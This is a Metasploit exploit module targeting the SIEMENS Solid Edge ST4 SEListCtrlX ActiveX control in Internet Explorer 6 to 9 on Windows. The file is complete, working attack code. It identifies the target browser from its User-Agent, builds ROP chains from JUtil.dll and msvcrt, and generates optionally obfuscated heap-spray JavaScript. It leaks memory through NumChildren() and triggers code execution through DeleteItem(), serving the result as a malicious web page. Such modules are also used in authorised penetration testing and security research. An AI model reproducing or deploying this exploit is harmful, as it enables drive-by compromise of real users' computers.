## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. #   http://metasploit.com/framework/ ##   require 'msf/core'  class Metasploit3 < Msf::Exploit::Remote   Rank = NormalRanking     include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::RopDb   include Msf::Exploit::Remote::BrowserAutopwn     autopwn_info({     :ua_name    => HttpClients::IE,     :ua_minver  => "6.0",     :ua_maxver  => "9.0",     :javascript => true,     :os_name    => OperatingSystems::WINDOWS,     :rank       => Rank,     :classid    => "{5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}"  })     def initialize(info={})     super(update_info(info,       'Name'           => "SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",       'Description'    => %q{         This module exploits the SEListCtrlX ActiveX installed with the SIEMENS Solid Edge product.         The vulnerability exists on several APIs provided by the control, where user supplied input         is handled as a memory pointer without proper validation, allowing an attacker to read and        corrupt memory from the target process. This module abuses the methods NumChildren() and        DeleteItem() in order to achieve memory info leak and remote code execution respectively.         This module has been tested successfully on IE6-IE9 on Windows XP SP3 and Windows 7 SP1,         using Solid Edge 10.4.       },       'License'        => MSF_LICENSE,       'Author'         =>         [           'rgod <rgod[at]autistici.org>', # Vulnerability discovery and PoC           'juan vazquez' # Metasploit module         ],       'References'     =>         [           [ 'OSVDB', '93696' ],           [ 'EDB', '25712' ],           [ 'URL', 'http://retrogod.altervista.org/9sg_siemens_adv_ii.htm' ]         ],       'Payload'        =>         {           'Space' => 906,           'DisableNops' => true,           'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500         },       'DefaultOptions'  =>         {           'InitialAutoRunScript' => 'migrate -f'        },       'Platform'       => 'win',       'Targets'        =>         [           # Jutil.dll 104.0.0.82           # SEListCtrlX 104.0.0.82           [ 'Automatic', {} ],           [ 'IE 6 on Windows XP SP3', { 'Rop' => nil,  'Offset' => '0x5F4' } ],           [ 'IE 7 on Windows XP SP3', { 'Rop' => nil,  'Offset' => '0x5F4' } ],           [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4' } ],           [ 'IE 7 on Windows Vista',  { 'Rop' => nil,  'Offset' => '0x5f4' } ],           [ 'IE 8 on Windows Vista',  { 'Rop' => :jutil, 'Offset' => '0x5f4' } ],           [ 'IE 8 on Windows 7',      { 'Rop' => :jutil, 'Offset' => '0x5f4' } ],           [ 'IE 9 on Windows 7',      { 'Rop' => :jutil, 'Offset' => '0x5fe' } ]         ],       'Privileged'     => false,       'DisclosureDate' => "May 26 2013",       'DefaultTarget'  => 0))       register_options(       [         OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])       ], self.class)     end    def junk     return rand_text_alpha(4).unpack("V").first   end    def get_target(agent)     #If the user is already specified by the user, we'll just use that     return target if target.name != 'Automatic'      nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''      ie_name = "IE #{ie}"      case nt     when '5.1'      os_name = 'Windows XP SP3'    when '6.0'      os_name = 'Windows Vista'    when '6.1'      os_name = 'Windows 7'    end      targets.each do |t|       if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))         print_status("Target selected as: #{t.name}")         return t       end    end      return nil  end    # JUtil ROP Chain   # Jutil Base: 0x1d550000   # Stack Pivot: jutil_base + 0x000a5843 # xchg eax, esp # ret   # Adjust Stack: jutil_base + 0x00212f17 # pop # pop # ret   # 0x1db2e121, # POP EDX # RETN [JUtil.dll]   # 0x1d5520ca, # ptr to &VirtualProtect() [IAT JUtil.dll]   # 0x1da0ebeb, # MOV EDX,DWORD PTR DS:[EDX] # RETN [JUtil.dll]   # 0x1da103d2, # MOV ESI,EDX # RETN [JUtil.dll]   # 0x1d70e314, # POP EBP # RETN [JUtil.dll]   # 0x1d5fc8e8, # & jmp esp [JUtil.dll]   # 0x1d631859, # POP EBX # RETN [JUtil.dll]   # 0x00000201, # 0x00000201-> ebx   # 0x1d769cf9, # POP EDX # RETN [JUtil.dll]   # 0x00000040, # 0x00000040-> edx   # 0x1d6d2e50, # POP ECX # RETN [JUtil.dll]   # 0x1da45217, # &Writable location [JUtil.dll]   # 0x1d632fd1, # POP EDI # RETN [JUtil.dll]   # 0x1d6839db, # RETN (ROP NOP) [JUtil.dll]   # 0x1d752439, # POP EAX # RETN [JUtil.dll]   # 0x90909090, # nop   # 0x1da4cfe3, # PUSHAD # RETN [JUtil.dll]   def ie9_spray(t, p)     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(t.arch))       js = %Q|       function rop_chain(jutil_base){       var arr = [         Number(Math.floor(Math.random()*0xffffffff)),         Number(0x0c0c0c0c),         Number(0x0c0c0c0c),         Number(0x0c0c0c1c),         Number(0x0c0c0c24),         Number(0x0c0c0c28),         Number(Math.floor(Math.random()*0xffffffff)),         Number(Math.floor(Math.random()*0xffffffff)),         Number(0x0c0c0c0c),         Number(0x0c0c0c3c),         jutil_base + Number(0x00212f17),         jutil_base + Number(0x000a5843),         Number(0x0c0c0c34),         jutil_base + Number(0x5de121),         jutil_base + Number(0x20ca),         jutil_base + Number(0x4bebeb),         jutil_base + Number(0x4c03d2),         jutil_base + Number(0x1be314),         jutil_base + Number(0xac8e8),         jutil_base + Number(0xe1859),         Number(0x00000201),         jutil_base + Number(0x219cf9),         Number(0x00000040),         jutil_base + Number(0x182e50),         jutil_base + Number(0x4f5217),         jutil_base + Number(0xe2fd1),         jutil_base + Number(0x1339db),         jutil_base + Number(0x202439),         Number(0x90909090),         jutil_base + Number(0x4fcfe3)       ];       return arr;     }       function d2u(dword){       var uni = String.fromCharCode(dword & 0xFFFF);       uni += String.fromCharCode(dword>>16);       return uni;     }       function tab2uni(tab){       var uni = ""      for(var i=0;i<tab.length;i++){         uni += d2u(tab[i]);       }       return uni;     }       function randomblock(blocksize)     {       var theblock = "";       for (var i = 0; i < blocksize; i++)       {         theblock += Math.floor(Math.random()*90)+10;       }       return theblock;     }       function tounescape(block)     {       var blocklen = block.length;       var unescapestr = "";       for (var i = 0; i < blocklen-1; i=i+4)       {         unescapestr += "%u" + block.substring(i,i+4);       }       return unescapestr;     }       var heap_obj = new heapLib.ie(0x10000);     var code = unescape("#{js_code}");     var nops = unescape("#{js_random_nops}");       function heap_spray(jutil_base) {       while (nops.length < 0x80000) nops += nops;       var offset_length = #{t['Offset']};       for (var i=0; i < 0x1000; i++) {         var padding = unescape(tounescape(randomblock(0x1000)));         while (padding.length < 0x1000) padding+= padding;         var junk_offset = padding.substring(0, offset_length);         var rop = tab2uni(rop_chain(jutil_base));         var single_sprayblock = junk_offset + rop + code + nops.substring(0, 0x800 - rop.length -  code.length - junk_offset.length);         while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;         sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);         heap_obj.alloc(sprayblock);       }     }     |     return js   end    def ie8_spray(t, p)     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))       js = %Q|     var heap_obj = new heapLib.ie(0x20000);     var code = unescape("#{js_code}");     var nops = unescape("#{js_nops}");       function rop_chain(jutil_base){       var arr = [         Number(Math.floor(Math.random()*0xffffffff)),         Number(0x0c0c0c0c),         Number(0x0c0c0c0c),         Number(0x0c0c0c1c),         Number(0x0c0c0c24),         Number(0x0c0c0c28),         Number(Math.floor(Math.random()*0xffffffff)),         Number(Math.floor(Math.random()*0xffffffff)),         Number(0x0c0c0c0c),         Number(0x0c0c0c3c),         jutil_base + Number(0x00212f17),         jutil_base + Number(0x000a5843),         Number(0x0c0c0c34),         jutil_base + Number(0x5de121),         jutil_base + Number(0x20ca),         jutil_base + Number(0x4bebeb),         jutil_base + Number(0x4c03d2),         jutil_base + Number(0x1be314),         jutil_base + Number(0xac8e8),         jutil_base + Number(0xe1859),         Number(0x00000201),         jutil_base + Number(0x219cf9),         Number(0x00000040),         jutil_base + Number(0x182e50),         jutil_base + Number(0x4f5217),         jutil_base + Number(0xe2fd1),         jutil_base + Number(0x1339db),         jutil_base + Number(0x202439),         Number(0x90909090),         jutil_base + Number(0x4fcfe3)       ];       return arr;     }       function d2u(dword){       var uni = String.fromCharCode(dword & 0xFFFF);       uni += String.fromCharCode(dword>>16);       return uni;     }       function tab2uni(tab){       var uni = ""      for(var i=0;i<tab.length;i++){         uni += d2u(tab[i]);       }       return uni;     }       function heap_spray(jutil_base) {       while (nops.length < 0x80000) nops += nops;       var offset = nops.substring(0, #{t['Offset']});       var rop = tab2uni(rop_chain(jutil_base));       var shellcode = offset + rop + code + nops.substring(0, 0x800-rop.length-code.length-offset.length);       while (shellcode.length < 0x40000) shellcode += shellcode;       var block = shellcode.substring(0, (0x80000-6)/2);       heap_obj.gc();       for (var i=1; i < 0x300; i++) {         heap_obj.alloc(block);       }     }     |     return js   end    def ie6_spray(t, p)     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))       js = %Q|     var heap_obj = new heapLib.ie(0x20000);     var nops = unescape("#{js_nops}");     var code = unescape("#{js_code}");       function heap_spray() {       while (nops.length < 0x80000) nops += nops;       var offset = nops.substring(0, #{t['Offset']});       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);       while (shellcode.length < 0x40000) shellcode += shellcode;       var block = shellcode.substring(0, (0x80000-6)/2);       heap_obj.gc();       for (var i=1; i < 0x300; i++) {         heap_obj.alloc(block);       }     }     |     return js   end    def ie_heap_spray(my_target, p)     # Land the payload at 0x0c0c0c0c     case my_target     when targets[7]       # IE 9 on Windows 7       js = ie9_spray(my_target, p)     when targets[5], targets[6]       # IE 8 on Windows 7 and Windows Vista       js = ie8_spray(my_target, p)     else      js = ie6_spray(my_target, p)     end      js = heaplib(js, {:noobfu => true})       if datastore['OBFUSCATE']       js = ::Rex::Exploitation::JSObfu.new(js)       js.obfuscate       @heap_spray_fn = js.sym("heap_spray")     else      @heap_spray_fn = "heap_spray"    end      return js   end    def get_windows_xp_payload     fake_memory = [         junk,       # junk         # 0c0c0c0c         0x0c0c0c0c, # Dereference  # 0c0c0c10         0x0c0c0c0c, # Dereference  # 0c0c0c14         0x0c0c0c1c, # [0x0c0c0c0c] # 0c0c0c18         0x0c0c0c24, # Dereference  # 0c0c0c1c         0x0c0c0c28, # Dereference  # 0c0c0c20         junk,       # junk         # 0c0c0c24         junk,       # junk         # 0c0c0c28         0x0c0c0c0c, # Dereference  # 0c0c0c2c         0x0c0c0c30, # Dereference  # 0c0c0c30         0x0c0c0c38, # new eip      # 0c0c0c34     ].pack("V*")       p = fake_memory + payload.encoded       return p   end    def get_windows_msvcrt_payload     fake_memory = [         junk,       # junk         # 0c0c0c0c         0x0c0c0c0c, # Dereference  # 0c0c0c10         0x0c0c0c0c, # Dereference  # 0c0c0c14         0x0c0c0c1c, # [0x0c0c0c0c] # 0c0c0c18         0x0c0c0c24, # Dereference  # 0c0c0c1c         0x0c0c0c28, # Dereference  # 0c0c0c20         junk,       # junk         # 0c0c0c24         junk,       # junk         # 0c0c0c28         0x0c0c0c0c, # Dereference  # 0c0c0c2c         0x0c0c0c3c, # Dereference  # 0c0c0c30         0x77c21ef4, # ppr msvcrt   # 0c0c0c34         0x77c15ed5, # xchg eax,esp # ret (msvcrt)         0x0c0c0c34  # eax value    # 0c0c0c3c     ].pack("V*")       return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})   end    def get_payload(t)       # Both ROP chains generated by mona.py - See corelan.be     case t['Rop']     when :msvcrt      print_status("Using msvcrt ROP")       p = get_windows_msvcrt_payload     when :jutil      print_status("Using JUtil ROP built dynamically...")       p = payload.encoded     else      print_status("Using payload without ROP...")       p = get_windows_xp_payload     end      return p   end    def info_leak_trigger     js = <<-EOS    <object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />     </object>     <script language='javascript'>     jutil_address = obj.NumChildren(0x10017018 - 0x0c);     jutil_base = jutil_address - 0x49440;     #{@heap_spray_fn}(jutil_base);     obj.DeleteItem(0x0c0c0c08);     </script>     EOS      return js   end    def exec_trigger     js = <<-EOS    <object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />     </object>     <script language='javascript'>     #{@heap_spray_fn}();     obj.DeleteItem(0x0c0c0c08);     </script>     EOS      return js   end    def get_trigger(t)     case t['Rop']       when :jutil        js = info_leak_trigger       else        js = exec_trigger     end      return js   end    def load_exploit_html(my_target)     p  = get_payload(my_target)     js = ie_heap_spray(my_target, p)     trigger = get_trigger(my_target)       html = %Q|     <html>     <head>     <script language='javascript'>     #{js}     </script>     </head>     <body>     #{trigger}     </body>     </html>     |       return html   end    def on_request_uri(cli, request)     agent = request.headers['User-Agent']     uri   = request.uri     print_status("Requesting: #{uri}")       my_target = get_target(agent)     # Avoid the attack if no suitable target found     if my_target.nil?       print_error("Browser not supported, sending 404: #{agent}")       send_not_found(cli)       return    end      html = load_exploit_html(my_target)     html = html.gsub(/^\t\t/, '')     print_status("Sending HTML...")     send_response(cli, html, {'Content-Type'=>'text/html'})   end  end